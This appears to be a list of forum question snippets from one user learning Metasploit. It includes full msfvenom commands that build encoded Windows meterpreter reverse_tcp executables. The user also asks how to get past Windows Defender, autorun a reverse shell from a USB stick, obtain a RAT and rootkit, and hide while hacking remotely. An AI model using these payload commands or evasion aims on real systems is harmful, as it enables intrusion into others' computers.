hi :D i created a paylaod using msfvenom and i use the encoder Shikata Ga Nai msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT= 4444 -e x86/shikata_ga_nai -i 20 -f exe > xxx.exe and then i moved it to my windows 7 and 10 and the windows defender pop up and catc ...more
hi guys :D how can i can exploit a machine with an usb stick ? lets say i when the usb is pluged it will auto run an exe file to create a reverse tcp connection some one know how can i do it ?
hi i need some help with creating a undetecable paylaod the script i am using is msfvenom -p windows/meterpreter/reversetcp LHOST=10.0.0.2 LPORT=4444 -f exe -e x86/shikataga_nai -i 200 > xxx.exe after i create the payload i move it to a windows 10 64bit and its immediately pi ...more
hi i was wondering what is The difference between encoders and crypters and who is more used in practical real world hacking?
i am looking for clean download , anyone know a site that can be trusted?
hi i was wondering lets say i wanna crate a paylaod for a computer i know that the computer is runnig windows but i dont know if it 32 or 64 bits what can i do ? will x86 paylaod run on 32 and 64 bit operating system?
pentesting tools for android ? some have recommendations?
I was wondering if smart password generator like eliot use in MR ROBOT is really exist and viable ? if u didnt watch the show it is a ganerator that you put in the all the info u have on him and its create a wordlist for u to use and try to brute force is passwords.
lets say i am creating a revese_tcp payload in msfvenum how can i create the payload without puting in the LHOST my own ip and still be able to connnect to the payload?
hi i was wondering what the difference between the two payloads use payload/windows/meterpeter/reverse_tcp and use payload/windows/meterpeter_reverse_tcp there are doc on all the exploit in metasploit ?
HI can some one recomend me a good free rat and rootkit ? where can i find and download them safely ?
default tor conf in proxychain is in socks4 can i change it to socks5 ? this is recomended to do ?
if i am hacking a coumputer remotly , and i wanna stay anonymous how can i do it ? lets say i am useing armitage or any other program (even a revesetcp payload(the payload have your ip so it can connect to the pc back)) how can i protect myself so no once can get to me ?
hi :D i am looking for the main directory of metasploit (like otw in this tutorial http://null-byte.wonderhowto.com/how-to/hack-like-pro-exploring-inner-architecture-metasploit-0151006/ ) so i can easy find the exploit i am looking for buth i dont know how and from my unders ...more